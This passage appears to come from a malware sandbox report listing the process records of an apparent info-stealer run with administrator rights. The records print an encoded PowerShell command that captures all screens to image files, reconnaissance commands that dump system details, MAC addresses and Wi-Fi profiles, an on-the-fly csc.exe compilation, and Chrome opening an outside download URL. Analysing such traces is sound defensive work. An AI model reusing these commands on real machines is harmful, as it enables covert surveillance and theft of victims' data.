                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7356c0000
                                                                                                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:42
                                                                                                                                                                                                                                                                                                                      Start time:14:19:10
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:tree /A /F
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7f9ad0000
                                                                                                                                                                                                                                                                                                                      File size:20'992 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:43
                                                                                                                                                                                                                                                                                                                      Start time:14:19:10
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\systeminfo.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:systeminfo
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7821c0000
                                                                                                                                                                                                                                                                                                                      File size:110'080 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:44
                                                                                                                                                                                                                                                                                                                      Start time:14:19:10
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:45
                                                                                                                                                                                                                                                                                                                      Start time:14:19:10
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:netsh wlan show profile
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff673e00000
                                                                                                                                                                                                                                                                                                                      File size:96'768 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:46
                                                                                                                                                                                                                                                                                                                      Start time:14:19:11
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff788560000
                                                                                                                                                                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:48
                                                                                                                                                                                                                                                                                                                      Start time:14:19:11
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://www.trksyln.net/tgmacro/download
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                                                                                                      Target ID:49
                                                                                                                                                                                                                                                                                                                      Start time:14:19:12
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7356c0000
                                                                                                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:50
                                                                                                                                                                                                                                                                                                                      Start time:14:19:13
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:51
                                                                                                                                                                                                                                                                                                                      Start time:14:19:13
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:tree /A /F
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7f9ad0000
                                                                                                                                                                                                                                                                                                                      File size:20'992 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:52
                                                                                                                                                                                                                                                                                                                      Start time:14:19:14
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7356c0000
                                                                                                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:53
                                                                                                                                                                                                                                                                                                                      Start time:14:19:14
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:54
                                                                                                                                                                                                                                                                                                                      Start time:14:19:14
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:tree /A /F
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7f9ad0000
                                                                                                                                                                                                                                                                                                                      File size:20'992 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:55
                                                                                                                                                                                                                                                                                                                      Start time:14:19:14
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "getmac"
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7356c0000
                                                                                                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:56
                                                                                                                                                                                                                                                                                                                      Start time:14:19:15
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:57
                                                                                                                                                                                                                                                                                                                      Start time:14:19:15
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4mvljvuo\4mvljvuo.cmdline"
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff636240000
                                                                                                                                                                                                                                                                                                                      File size:2'759'232 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:58
                                                                                                                                                                                                                                                                                                                      Start time:14:19:15
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7356c0000
                                                                                                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:59
                                                                                                                                                                                                                                                                                                                      Start time:14:19:15
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\getmac.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:getmac
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff6ddb60000
                                                                                                                                                                                                                                                                                                                      File size:90'112 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:7D4B72DFF5B8E98DD1351A401E402C33
                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                      Target ID:60
                                                                                                                                                                                                                                                                                                                      Start time:14:19:15
                                                                                                                                                                                                                                                                                                                      Start date:31/10/2024
                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
